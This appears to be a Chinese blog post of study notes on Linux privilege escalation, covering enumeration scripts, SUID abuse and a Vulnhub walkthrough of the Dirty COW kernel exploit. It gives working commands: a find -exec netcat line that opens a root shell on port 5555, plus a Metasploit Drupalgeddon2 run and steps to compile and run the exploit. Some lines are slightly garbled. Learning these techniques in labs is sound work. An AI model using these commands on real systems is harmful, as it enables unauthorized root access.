权限提升-Linux脏牛内核漏洞&SUID&信息收集

最新推荐文章于 2024-04-29 22:40:13 发布
最新推荐文章于 2024-04-29 22:40:13 发布
阅读量200 收藏
点赞数
分类专栏: 权限提升 小迪安全 文章标签: linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44805159/article/details/120744665
版权

linux提权一般放置tmp目录,临时目录,一般可读写,可执行.sh是linux可执行文件
运行:./linux.x.x.x.x.sh
perl对应的是 pl
有本地用户,就本地提权,没有就通过MSF提权
#案例1.Linux提权自动化脚本利用-4个脚本
两个信息收集:LinEnum,linuxprivchecker
为后续的提权方法提供基础,
两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2


#案例2.LInux提权SUID配合脚本演示-Web
漏洞成因:chmod u+s 给予了 suid u-s删除了suid
使程序在运行过程中受到lsuid root权限的执行过程导致
(普通用户执行,实际是以root权限执行)
提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

参考利用:https://pentestlab.blog/2017/09/25/suid-executables/
touch xiaodi
find xiaodi -exec whoami ;
ind xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
netcat xx.xx.xx.xx 5555
0x01.得到webshell权限
image.png

gcc 45010.c -o 45010
chmod +x 45010
./45010
id

#案例4.LInux提权脏牛内核漏洞演示-Vulnhub
内核提权整个过程:(linux-exploit-suggester 获取信息哦)
vulnhub 靶机-探针目标-CMS 漏洞利用-脚本探针提权漏洞-利用内核提权-GG 内核漏洞
提权过程:寻可用-下 exp-上/tmp-编译 exp-执行(无权限用 chmod)

nmap 192.168.76.0/24
nmap -p1-65535 192.168.76.141
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set lhost 192.168.76.141
set lport 1898
set target 0
run
upload /tmp/40837.cpp /tmp/40837.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'	#利用python生成可交互式shell
./dcow

脏牛漏洞:
https://paper.seebug.org/483/#_4
ps://paper.seebug.org/483/#_4)

雨雾_雨屋
关注
专栏目录
提权—Linux 脏牛内核漏洞&SUID&信息收集
qi_SJQ_的博客
02-04 2874
1.Linux信息收集Linux 提权自动化脚本 4个脚本(这几个项目都可以在github找到): 两个信息收集:LinEnum,linuxprivchecker 两个漏洞探针:linux-exploit-suggester ,linux-exploit-suggester2 1)LinEnum:通过webshell等权限将脚本上传到/tmp目录然后执行即可(这个目录是一个临时目录,重启后会清空,一般是可以进行读写的,上传其他目录可能会因为权限不够而失败)。 2)Linuxprivchecker:.
权限提升-Linux脏牛内核漏洞&SUID&信息搜集
qq_59350385的博客
05-12 671
目录 一、信息搜集 二、Linux 提权 SUID漏洞成因】: 【查看suid和guid文件】: 【其他命令】: 【常用提权方式】: namp: find vi/vim less more mv /cp nano awk man wget python perl tcpdump 三、内核漏洞提权演示 【靶标】 【工具】 【提权测试】 一、信息搜集 提权自动化脚本利用 两个信息收集:LinEnum,linuxpricchecker 两个漏洞..
软件漏洞分析与利用:SUID程序、DLL劫持及其他实战案例详解
Kali与编程
04-23 532
SUID(Set-User-ID)是一种在Unix/Linux系统中设置文件权限的特殊标志位,允许普通用户执行具有SUID权限的程序时暂时获得程序所有者的权限。DLL劫持(Dynamic-Link Library Hijacking)是Windows系统中的一个常见漏洞类型,发生在程序尝试加载系统DLL文件时,由于搜索路径的设定问题,可能会加载到攻击者预先放入特定目录下的恶意DLL文件。"的参数,注入额外的命令,由于运行该脚本时具有SUID权限,因此可以执行原本无权执行的系统命令,获取敏感信息或提升权限
63权限提升-Linux脏牛内核漏洞&SUID&信息收集
san3144393495的博客
12-24 1075
今天讲到的方法是suid内核漏洞
如何堵住SUID漏洞
weixin_34221276的博客
03-06 199
如何堵住SUID漏洞 2007-10-08 17:27  佚名 网络   SUID是网络***者非常爱用的***入口,SUID Root程序更是***者在UNIX系统留后门的一种主要形式。SUID程序代表了重要的安全漏洞,特别是SUID设为root的程序,随便翻开一本计算机安全书籍都能够找到关于注意SUID安全的章节。但到底什么是SUID?SUID的工作原理...
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
在本文中,我们将深入探讨Linux系统中的权限提升,特别是通过利用Linux脏牛内核漏洞SUID权限以及信息收集来实现这一目标。这些技术在网络安全领域非常重要,因为它们可以帮助安全研究人员发现并修复潜在的安全漏洞...
Linux提权技术:脏牛内核漏洞SUID实战
"这篇资料主要介绍了Linux环境下的权限提升技巧,包括利用脏牛内核漏洞SUID权限信息收集。通过四个不同的案例,详细展示了提权的具体步骤和工具使用。" 在Linux系统中,权限提升是黑客或安全研究员为了获取更高...
权限提升-linux提权手法总结
01-14
基本Linux权限提升前的信息收集 在进行权限提升之前,攻击者需要收集大量的信息来帮助确定可行的攻击路径。这包括但不限于: - **操作系统类型**:通过`cat /etc/*-release`等命令来获取Linux发行版的信息。 - **...
Linux提权--SUID提权&内核漏洞本地用户提权
最新发布
金灰的博客
04-29 890
免责声明:本文仅做技术交流与学习,请不要乱搞破坏...
windows服务器系统漏洞的处理
wyqwilliam的博客
09-02 1709
原处理方式 受影响主机 10.206.211.25;点击查看详情; 详细描述 SSL/TLS协议是一个被广泛使用的加密协议,Bar Mitzvah攻击实际上是利用了"不变性漏洞",这是RC4算法中的一个缺陷,它能够在某些情况下泄露SSL/TLS加密流量中的密文,从而将账户用户名密码,信用卡数据和其他敏感信息泄露给黑客。 解决办法 临时解决方法: SSL/TLS -------- 1、禁止apache服务器使用RC4加密算法 vi /etc/httpd/conf.d/ssl..
linux CVE-2021-4034漏洞复现和修复建议
weixin_42540999的博客
02-10 4244
修复前 1.查看系统版本(使用centos7.5系统) 2.查看polkit版本 3.漏洞复现POC ①新建普通用户 ②上传POC到服务器并进行编译 ③切换普通用户并进行执行(可看出提权成功,已为root权限漏洞修复 1.临时解决方法 ①删除pkexec的SUID-bit权限来缓解该漏洞风险 chmod 0755 /usr/bin/pkexec ②修复验证(已无法进行提权) 2.进行版本补丁的更新 ①centos官方已更新补丁 ②下载补丁包并上传至服务器 rpm -Uvh polkit
惊爆!!!一条命令,瞬间让普通用户提权为root,赶紧修复
笨办法学linux的博客
08-25 1516
漏洞非常容易利用,允许任何未经授权的用户通过在其默认配置中利用此漏洞,来获得易受攻击主机上的完全root权限
安全脚本--sudo内存溢出漏洞(CVE-2021-3156)修复
淡定波的博客
03-20 669
一、漏洞说明 Sudo是一个强大的实用程序,它包含在大多数(如果不是所有的Unix)和基于Linux 的操作系统中。它允许用户使用其他用户的安全权限运行程序。绝大多数基于Unix和Linux的操作系统都包含Sudo。 在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限漏洞验证截图: 二、影响范围: 漏洞影响版本: Debian已修
经典Linux提取(脏牛CVE-2016-5195)小记
weixin_51392885的博客
11-16 451
Linux提取
靶机Lampiao之脏牛提权
m0_52754338的博客
10-02 1631
同样,将下载好的脏牛EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux权限还是不够,对Linux进行信息收集,查看可以用的漏洞,并提升权限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
Lampião: 1(Linux提权-脏牛内核漏洞
weixin_51423993的博客
01-19 3871
靶机环境下载地址https://www.vulnhub.com/entry/lampiao-1,249/ 环境:攻击机:kali虚拟机192.168.76.132 靶机:ip未知 过程:探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权 靶机密码也没有,ip也没有 探针目标 靶机和kali在同网段,所以kali用nmap扫描同网段存活主机和其端口 namp 192.168.76.0/24 扫出一个192.168.76.141的主机 继续扫他的端口 nmap -p1 -65535 192.16
Linux靶机练习
SYJ_361的博客
03-27 9174
这里是对Linux靶机的各种练习,包括Lampiao、Raven2、Tr0ll、zico2、DC-6、DC-9等,利用kali、蚁剑等对靶机进行提权,并找到root里面的flag文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨雾_雨屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值